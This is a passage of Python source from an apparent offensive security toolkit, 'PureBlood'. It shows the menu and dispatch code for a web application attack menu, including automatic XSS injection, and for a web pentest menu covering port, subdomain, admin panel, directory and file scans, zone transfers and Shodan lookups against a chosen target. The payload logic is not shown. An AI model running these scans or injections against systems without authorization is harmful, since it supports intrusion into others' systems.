| wap_auto_xss_injection = cweb_application_atttack.wap_auto_xss_injection(url) 1999 | except NameError: 2000 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2001 | time.sleep(2) 2002 | print ('') 2003 | web_application_attack() 2004 | except KeyboardInterrupt: 2005 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2006 | sys.exit() 2007 | print (reset) 2008 | print ('{0}='.format(red) * int(sizex)) 2009 | print ('') 2010 | web_application_attack() 2011 | elif choice == 90: 2012 | main() 2013 | elif choice == 95: 2014 | print ('') 2015 | print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan)) 2016 | if sys.version_info[0] == 3: 2017 | target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 2018 | if sys.version_info[0] == 2: 2019 | target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 2020 | print ('') 2021 | set_target(target, 2) 2022 | elif choice == 99: 2023 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2024 | sys.exit() 2025 | else: 2026 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 2027 | time.sleep(2) 2028 | print ('') 2029 | web_application_attack() 2030 | 2031 | 2032 | 2033 | def web_pentest(): 2034 | global web_pentest_output 2035 | global web_pentest_outputfile 2036 | print ("""{3}[ {5}Web Pentest {3}] 2037 | 2038 | {2}01{3}) {5}Banner Grab 2039 | {2}02{3}) {5}Whois 2040 | {2}03{3}) {5}Traceroute 2041 | {2}04{3}) {5}DNS Record 2042 | {2}05{3}) {5}Reverse DNS Lookup 2043 | {2}06{3}) {5}Zone Transfer Lookup 2044 | {2}07{3}) {5}Port Scan 2045 | {2}08{3}) {5}Admin Panel Scan 2046 | {2}09{3}) {5}Subdomain Scan 2047 | {2}10{3}) {5}CMS Identify 2048 | {2}11{3}) {5}Reverse IP Lookup 2049 | {2}12{3}) {5}Subnet Lookup 2050 | {2}13{3}) {5}Extract Page Links 2051 | {2}14{3}) {5}Directory Fuzz 2052 | {2}15{3}) {5}File Fuzz 2053 | {2}16{3}) {5}Shodan Search 2054 | {2}17{3}) {5}Shodan Host Lookup 2055 | {2}90{3}) {5}Back To Menu 2056 | {2}95{3}) {5}Set Target 2057 | {2}99{3}) {5}Exit 2058 | {0}""".format(reset, red, green, blue, yellow, cyan)) 2059 | if sys.version_info[0] == 3: 2060 | try: 2061 | choice = int(input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red))) 2062 | except KeyboardInterrupt: 2063 | try: 2064 | print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output) 2065 | except: 2066 | pass 2067 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2068 | sys.exit() 2069 | except ValueError: 2070 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 2071 | time.sleep(2) 2072 | print ('') 2073 | web_pentest() 2074 | elif sys.version_info[0] == 2: 2075 | try: 2076 | choice = int(raw_input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red))) 2077 | except KeyboardInterrupt: 2078 | try: 2079 | print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output) 2080 | except: 2081 | pass 2082 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2083 | sys.exit() 2084 | except ValueError: 2085 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 2086 | time.sleep(2) 2087 | print ('') 2088 | web_pentest() 2089 | cweb_pentest = WebPentest() 2090 | if choice == 1: 2091 | try: 2092 | wp_banner_grab = cweb_pentest.banner_grab(url) 2093 | except NameError: 2094 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2095 | time.sleep(2) 2096 | web_pentest() 2097 | except KeyboardInterrupt: 2098 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2099 | sys.exit() 2100 | print ('{0}='.format(red) * int(sizex)) 2101 | web_pentest_outputfile.write('[+] Banner Grab Result - ' + url) 2102 | web_pentest_outputfile.write('\n============================================================') 2103 | print (reset + bold) 2104 | print (wp_banner_grab) 2105 | web_pentest_outputfile.write('\n' + wp_banner_grab) 2106 | print (reset) 2107 | print ('{0}='.format(red) * int(sizex)) 2108 | web_pentest_outputfile.write('\n') 2109 | web_pentest_outputfile.write('============================================================\n') 2110 | web_pentest() 2111 | elif choice == 2: 2112 | try: 2113 | wp_whois = cweb_pentest.whois(url) 2114 | except NameError: 2115 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2116 | time.sleep(2) 2117 | web_pentest() 2118 | except KeyboardInterrupt: 2119 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2120 | sys.exit() 2121 | print ('{0}='.format(red) * int(sizex)) 2122 | web_pentest_outputfile.write('[+] Whois Result - ' + url) 2123 | web_pentest_outputfile.write('\n============================================================') 2124 | print (reset + bold) 2125 | print (wp_whois) 2126 | web_pentest_outputfile.write('\n' + str(wp_whois)) 2127 | print (reset) 2128 | print ('{0}='.format(red) * int(sizex)) 2129 | web_pentest_outputfile.write('\n') 2130 | web_pentest_outputfile.write('============================================================\n') 2131 | web_pentest() 2132 | elif choice == 3: 2133 | try: 2134 | wp_traceroute = cweb_pentest.traceroute(hostname) 2135 | except NameError: 2136 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2137 | time.sleep(2) 2138 | web_pentest() 2139 | except KeyboardInterrupt: 2140 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2141 | sys.exit() 2142 | print ('{0}='.format(red) * int(sizex)) 2143 | web_pentest_outputfile.write('[+] Traceroute Result - ' + url) 2144 | web_pentest_outputfile.write('\n============================================================') 2145 | print (reset + bold) 2146 | print (wp_traceroute) 2147 | web_pentest_outputfile.write('\n' + wp_traceroute) 2148 | print (reset) 2149 | print ('{0}='.format(red) * int(sizex)) 2150 | web_pentest_outputfile.write('\n') 2151 | web_pentest_outputfile.write('============================================================\n') 2152 | web_pentest() 2153 | elif choice == 4: 2154 | try: 2155 | wp_dns_record = cweb_pentest.dns_record(hostname) 2156 | except NameError: 2157 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2158 | time.sleep(2) 2159 | web_pentest() 2160 | except KeyboardInterrupt: 2161 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2162 | sys.exit() 2163 | print ('{0}='.format(red) * int(sizex)) 2164 | web_pentest_outputfile.write('[+] DNS Record Result - ' + url) 2165 | web_pentest_outputfile.write('\n============================================================') 2166 | print (reset + bold) 2167 | web_pentest_outputfile.write('\n') 2168 | for i in wp_dns_record: 2169 | print (i) 2170 | web_pentest_outputfile.write(str(i) + '\n') 2171 | print (reset) 2172 | print ('{0}='.format(red) * int(sizex)) 2173 | web_pentest_outputfile.write('\n') 2174 | web_pentest_outputfile.write('============================================================\n') 2175 | web_pentest() 2176 | elif choice == 5: 2177 | try: 2178 | wp_reverse_dns_lookup = cweb_pentest.reverse_dns_lookup(ip) 2179 | except NameError: 2180 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2181 | time.sleep(2) 2182 | web_pentest() 2183 | except KeyboardInterrupt: 2184 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2185 | sys.exit() 2186 | print ('{0}='.format(red) * int(sizex)) 2187 | web_pentest_outputfile.write('[+] Reverse DNS Lookup Result - ' + url) 2188 | web_pentest_outputfile.write('\n============================================================') 2189 | print (reset + bold) 2190 | print (wp_reverse_dns_lookup) 2191 | web_pentest_outputfile.write('\n' + wp_reverse_dns_lookup) 2192 | print (reset) 2193 | print ('{0}='.format(red) * int(sizex)) 2194 | web_pentest_outputfile.write('\n') 2195 | web_pentest_outputfile.write('============================================================\n') 2196 | web_pentest() 2197 | elif choice == 6: 2198 | try: 2199 | wp_zone_transfer_lookup = cweb_pentest.zone_transfer_lookup(hostname) 2200 | except NameError: 2201 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2202 | time.sleep(2) 2203 | web_pentest() 2204 | except KeyboardInterrupt: 2205 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2206 | sys.exit() 2207 | print ('{0}='.format(red) * int(sizex)) 2208 | web_pentest_outputfile.write('[+] Zone Transfer Lookup Result - ' + url) 2209 | web_pentest_outputfile.write('\n============================================================') 2210 | print (reset + bold) 2211 | print (wp_zone_transfer_lookup) 2212 | web_pentest_outputfile.write('\n' + wp_zone_transfer_lookup) 2213 | print (reset) 2214 | print ('{0}='.format(red) * int(sizex)) 2215 | web_pentest_outputfile.write('\n') 2216 | web_pentest_outputfile.write('============================================================\n') 2217 | web_pentest() 2218 | elif choice == 7: 2219 | if sys.version_info[0] == 3: 2220 | port_end = int(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red))) 2221 | if sys.version_info[0] == 2: 2222 | port_end = int(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red))) 2223 | try: 2224 | wp_port_scan = cweb_pentest.port_scan(hostname, port_end) 2225 | except NameError: 2226 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2227 | time.sleep(2) 2228 | web_pentest() 2229 | except KeyboardInterrupt: 2230 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2231 | sys.exit() 2232 | print ('{0}='.format(red) * int(sizex)) 2233 | web_pentest_outputfile.write('[+] Port Scan Result - ' + url) 2234 | web_pentest_outputfile.write('\n============================================================') 2235 | print (reset + bold) 2236 | web_pentest_outputfile.write('\n') 2237 | for i in wp_port_scan: 2238 | print (i) 2239 | web_pentest_outputfile.write(str(i) + '\n') 2240 | print (reset) 2241 | print ('{0}='.format(red) * int(sizex)) 2242 | web_pentest_outputfile.write('\n') 2243 | web_pentest_outputfile.write('============================================================\n') 2244 | web_pentest() 2245 | elif choice == 8: 2246 | try: 2247 | wp_admin_panel_scan = cweb_pentest.admin_panel_scan(url) 2248 | except NameError: 2249 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2250 | time.sleep(2) 2251 | web_pentest() 2252 | except KeyboardInterrupt: 2253 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2254 | sys.exit() 2255 | print ('{0}='.format(red) * int(sizex)) 2256 | web_pentest_outputfile.write('[+] Admin Panel Scan Result - ' + url) 2257 | web_pentest_outputfile.write('\n============================================================') 2258 | print (reset + bold) 2259 | web_pentest_outputfile.write('\n') 2260 | for i in wp_admin_panel_scan: 2261 | print (i) 2262 | web_pentest_outputfile.write(str(i) + '\n') 2263 | print (reset) 2264 | print ('{0}='.format(red) * int(sizex)) 2265 | web_pentest_outputfile.write('\n') 2266 | web_pentest_outputfile.write('============================================================\n') 2267 | web_pentest() 2268 | elif choice == 9: 2269 | if sys.version_info[0] == 3: 2270 | subdomain_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red))) 2271 | if sys.version_info[0] == 2: 2272 | subdomain_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red))) 2273 | try: 2274 | wp_subdomain_scan = cweb_pentest.subdomain_scan(hostname, subdomain_list) 2275 | except NameError: 2276 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2277 | time.sleep(2) 2278 | web_pentest() 2279 | except KeyboardInterrupt: 2280 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2281 | sys.exit() 2282 | so_200, so_301, so_302, so_403 = wp_subdomain_scan 2283 | print ('{0}='.format(red) * int(sizex)) 2284 | web_pentest_outputfile.write('[+] Subdomain Scan Result - ' + url) 2285 | web_pentest_outputfile.write('\n============================================================') 2286 | print (reset + bold) 2287 | web_pentest_outputfile.write('\n') 2288 | for i in so_200: 2289 | print ('[+] 200 - ' + i) 2290 | web_pentest_outputfile.write('[+] 200 - ' + i + '\n') 2291 | for i in so_301: 2292 | print ('[!] 301 - ' + i) 2293 | web_pentest_outputfile.write('[+] 301 - ' + i + '\n') 2294 | for i in so_302: 2295 | print ('[!] 302 - ' + i) 2296 | web_pentest_outputfile.write('[+] 302 - ' + i + '\n') 2297 | for i in so_403: 2298 | print ('[!] 403 - ' + i) 2299 | web_pentest_outputfile.write('[+] 403 - ' + i + '\n') 2300 | print (reset) 2301 | print ('{0}='.format(red) * int(sizex)) 2302 | web_pentest_outputfile.write('\n') 2303 | web_pentest_outputfile.write('============================================================\n') 2304 | web_pentest() 2305 | elif choice == 10: 2306 | try: 2307 | wp_cms_detect = cweb_pentest.cms_detect(hostname) 2308 | except NameError: 2309 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2310 | time.sleep(2) 2311 | web_pentest() 2312 | except KeyboardInterrupt: 2313 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2314 | sys.exit() 2315 | print ('{0}='.format(red) * int(sizex)) 2316 | web_pentest_outputfile.write('[+] CMS Detect - ' + url) 2317 | web_pentest_outputfile.write('\n============================================================') 2318 | print (reset + bold) 2319 | print (wp_cms_detect) 2320 | web_pentest_outputfile.write('\n' + wp_cms_detect) 2321 | print (reset) 2322 | print ('{0}='.format(red) * int(sizex)) 2323 | web_pentest_outputfile.write('\n') 2324 | web_pentest_outputfile.write('============================================================\n') 2325 | web_pentest() 2326 | elif choice == 11: 2327 | try: 2328 | wp_reverse_ip_lookup = cweb_pentest.reverse_ip_lookup(hostname) 2329 | except NameError: 2330 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2331 | time.sleep(2) 2332 | web_pentest() 2333 | except KeyboardInterrupt: 2334 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2335 | sys.exit() 2336 | print ('{0}='.format(red) * int(sizex)) 2337 | web_pentest_outputfile.write('[+] Reverse IP Lookup Result - ' + url) 2338 | web_pentest_outputfile.write('\n============================================================') 2339 | print (reset + bold) 2340 | print (wp_reverse_ip_lookup) 2341 | web_pentest_outputfile.write('\n' + wp_reverse_ip_lookup) 2342 | print (reset) 2343 | print ('{0}='.format(red) * int(sizex)) 2344 | web_pentest_outputfile.write('\n') 2345 | web_pentest_outputfile.write('============================================================\n') 2346 | web_pentest() 2347 | elif choice == 12: 2348 | if sys.version_info[0] == 3: 2349 | subnet_input = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red))) 2350 | if sys.version_info[0] == 2: 2351 | subnet_input = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red))) 2352 | try: 2353 | wp_subnet_lookup = cweb_pentest.subnet_lookup(subnet_input) 2354 | except NameError: 2355 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2356 | time.sleep(2) 2357 | web_pentest() 2358 | except KeyboardInterrupt: 2359 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2360 | sys.exit() 2361 | print ('{0}='.format(red) * int(sizex)) 2362 | print (reset + bold) 2363 | print (wp_subnet_lookup) 2364 | print (reset) 2365 | print ('{0}='.format(red) * int(sizex)) 2366 | web_pentest() 2367 | elif choice == 13: 2368 | try: 2369 | wp_links_extract = cweb_pentest.links_extract(url) 2370 | except NameError: 2371 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2372 | time.sleep(2) 2373 | web_pentest() 2374 | except KeyboardInterrupt: 2375 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2376 | sys.exit() 2377 | print ('{0}='.format(red) * int(sizex)) 2378 | web_pentest_outputfile.write('[+] Links Extract Result - ' + url) 2379 | web_pentest_outputfile.write('\n============================================================') 2380 | print (reset + bold) 2381 | print (wp_links_extract) 2382 | web_pentest_outputfile.write('\n' + wp_links_extract) 2383 | print (reset) 2384 | print ('{0}='.format(red) * int(sizex)) 2385 | web_pentest_outputfile.write('\n') 2386 | web_pentest_outputfile.write('============================================================\n') 2387 | web_pentest() 2388 | elif choice == 14: 2389 | if sys.version_info[0] == 3: 2390 | directory_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red))) 2391 | if sys.version_info[0] == 2: 2392 | directory_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red))) 2393 | try: 2394 | wp_directory_fuzz1, wp_directory_fuzz2, wp_directory_fuzz3 = cweb_pentest.directory_fuzz(url, directory_list) 2395 | except NameError: 2396 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2397 | time.sleep(2) 2398 | web_pentest() 2399 | except KeyboardInterrupt: 2400 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2401 | sys.exit() 2402 | print ('{0}='.format(red) * int(sizex)) 2403 | web_pentest_outputfile.write('[+] Directory Fuzz Result - ' + url) 2404 | web_pentest_outputfile.write('\n============================================================') 2405 | print (reset + bold) 2406 | web_pentest_outputfile.write('\n') 2407 | web_pentest_outputfile.write('Response 200:\n') 2408 | print ('[+] Response 200') 2409 | for i in wp_directory_fuzz1: 2410 | print (i) 2411 | web_pentest_outputfile.write(i + '\n') 2412 | web_pentest_outputfile.write('Response 301 / 302:\n') 2413 | print ('[+] Response 301 / 302') 2414 | for i in wp_directory_fuzz2: 2415 | print (i) 2416 | web_pentest_outputfile.write(i + '\n') 2417 | web_pentest_outputfile.write('[+] Response 403:\n') 2418 | print ('[+] Response 403') 2419 | for i in wp_directory_fuzz3: 2420 | print (i) 2421 | web_pentest_outputfile.write(i + '\n') 2422 | print (reset) 2423 | print ('{0}='.format(red) * int(sizex)) 2424 | web_pentest_outputfile.write('\n') 2425 | web_pentest_outputfile.write('============================================================\n') 2426 | web_pentest() 2427 | elif choice == 15: 2428 | if sys.version_info[0] == 3: 2429 | file_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red))) 2430 | if sys.version_info[0] == 2: 2431 | file_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red))) 2432 | try: 2433 | wp_file_fuzz1, wp_file_fuzz2, wp_file_fuzz3 = cweb_pentest.file_fuzz(url, file_list) 2434 | except NameError: 2435 | print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan)) 2436 | time.sleep(2) 2437 | web_pentest() 2438 | except KeyboardInterrupt: 2439 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2440 | sys.exit() 2441 | print ('{0}='.format(red) * int(sizex)) 2442 | web_pentest_outputfile.write('[+] File Fuzz Result - ' + url) 2443 | web_pentest_outputfile.write('\n============================================================') 2444 | print (reset + bold) 2445 | web_pentest_outputfile.write('\n') 2446 | web_pentest_outputfile.write('Response 200:\n') 2447 | print ('[+] Response 200') 2448 | for i in wp_file_fuzz1: 2449 | print (i) 2450 | web_pentest_outputfile.write(i + '\n') 2451 | web_pentest_outputfile.write('Response 301 / 302:\n') 2452 | print ('[+] Response 301 / 302') 2453 | for i in wp_file_fuzz2: 2454 | print (i) 2455 | web_pentest_outputfile.write(i + '\n') 2456 | web_pentest_outputfile.write('Response 403:\n') 2457 | print ('[+] Response 403') 2458 | for i in wp_file_fuzz3: 2459 | print (i) 2460 | web_pentest_outputfile.write(i + '\n') 2461 | print (reset) 2462 | print ('{0}='.format(red) * int(sizex)) 2463 | web_pentest_outputfile.write('\n') 2464 | web_pentest_outputfile.write('============================================================\n') 2465 | web_pentest() 2466 | elif choice == 16: 2467 | if sys.version_info[0] == 3: 2468 | shodan_search_query = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red))) 2469 | SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red))) 2470 | shodan_search_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red))) 2471 | if '.txt' not in shodan_search_output_filename: 2472 | shodan_search_output_filename = shodan_search_output_filename + '.txt' 2473 | else: 2474 | shodan_search_output_filename = shodan_search_output_filename 2475 | if sys.version_info[0] == 2: 2476 | shodan_search_query = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red))) 2477 | SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red))) 2478 | shodan_search_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red))) 2479 | if '.txt' not in shodan_search_output_filename: 2480 | shodan_search_output_filename = shodan_search_output_filename + '.txt' 2481 | else: 2482 | shodan_search_output_filename = shodan_search_output_filename 2483 | shodan_search_output = open('outputs/web_pentest/shodan/' + shodan_search_output_filename, 'a+') 2484 | shodan_search_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n') 2485 | wp_shodan_search = cweb_pentest.shodan_search(shodan_search_query, SHODAN_API_KEY) 2486 | print ('{0}='.format(red) * int(sizex)) 2487 | print (reset + bold) 2488 | print ('------------------------------.\n{1}[{2}#{1}] {3}- {4}Results Found: {5}|\n------------------------------.{0}'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total']))) 2489 | shodan_search_output.write('\n------------------------------.\n[#] - Results Found: {5}|\n------------------------------.\n'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total']))) 2490 | for i in wp_shodan_search['matches']: 2491 | try: 2492 | print ("""{6}[{7}#{6}] {8}- {9}Timestamp:{10} {0} 2493 | {6}[{7}+{6}] {8}- {9}IP:{10} {1} 2494 | {6}[{7}+{6}] {8}- {9}Port:{10} {2} 2495 | {6}[{7}+{6}] {8}- {9}OS:{10} {3} 2496 | {6}[{7}+{6}] {8}- {9}Hostnames:{10} {4} 2497 | {6}[{7}+{6}] {8}- {9}Data:{10} 2498 | {5} 2499 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset)) 2500 | shodan_search_output.write("""[#] - Timestamp: {0} 2501 | [+] - IP: {1} 2502 | [+] - Port: {2} 2503 | [+] - OS: {3} 2504 | [+] - Hostnames: {4} 2505 | [+] - Data: 2506 | {5} 2507 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset)) 2508 | except: 2509 | pass 2510 | shodan_search_output.write('\n\n') 2511 | shodan_search_output.close() 2512 | print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_search_output_filename) 2513 | print (reset) 2514 | print ('{0}='.format(red) * int(sizex)) 2515 | web_pentest() 2516 | elif choice == 17: 2517 | if sys.version_info[0] == 3: 2518 | shodan_host = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red))) 2519 | SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red))) 2520 | shodan_host_lookup_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red))) 2521 | if '.txt' not in shodan_host_lookup_output_filename: 2522 | shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt' 2523 | else: 2524 | shodan_host_lookup_output_filename = shodan_host_lookup_output_filename 2525 | if sys.version_info[0] == 2: 2526 | shodan_host = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red))) 2527 | SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red))) 2528 | shodan_host_lookup_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red))) 2529 | if '.txt' not in shodan_host_lookup_output_filename: 2530 | shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt' 2531 | else: 2532 | shodan_host_lookup_output_filename = shodan_host_lookup_output_filename 2533 | shodan_host_lookup_output = open('outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename, 'a+') 2534 | shodan_host_lookup_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n') 2535 | wp_shodan_host_lookup = cweb_pentest.shodan_host_lookup(shodan_host, SHODAN_API_KEY) 2536 | print ('{0}='.format(red) * int(sizex)) 2537 | print (reset + bold) 2538 | print ("""--------------------------.\n{1}[{2}#{1}] {3}- {4}General Information:{0}|\n--------------------------. 2539 | {1}[{2}#{1}] {3}- {4}IP:{0} {5} 2540 | {1}[{2}#{1}] {3}- {4}Ports:{0} {6} 2541 | {1}[{2}#{1}] {3}- {4}Tags:{0} {7} 2542 | {1}[{2}#{1}] {3}- {4}City:{0} {8} 2543 | {1}[{2}#{1}] {3}- {4}Country:{0} {9} 2544 | {1}[{2}#{1}] {3}- {4}Organization:{0} {10} 2545 | {1}[{2}#{1}] {3}- {4}ISP:{0} {11} 2546 | {1}[{2}#{1}] {3}- {4}Last Update:{0} {12} 2547 | {1}[{2}#{1}] {3}- {4}Hostnames:{0} {13} 2548 | {1}[{2}#{1}] {3}- {4}ASN:{0} {14} 2549 | """.format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A'))) 2550 | shodan_host_lookup_output.write("""--------------------------.\n[#] - General Information:|\n--------------------------. 2551 | [#] - IP: {5} 2552 | [#] - Ports: {6} 2553 | [#] - Tags: {7} 2554 | [#] - City: {8} 2555 | [#] - Country: {9} 2556 | [#] - Organization: {10} 2557 | [#] - ISP: {11} 2558 | [#] - Last Update: {12} 2559 | [#] - Hostnames: {13} 2560 | [#] - ASN: {14} 2561 | """.format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), 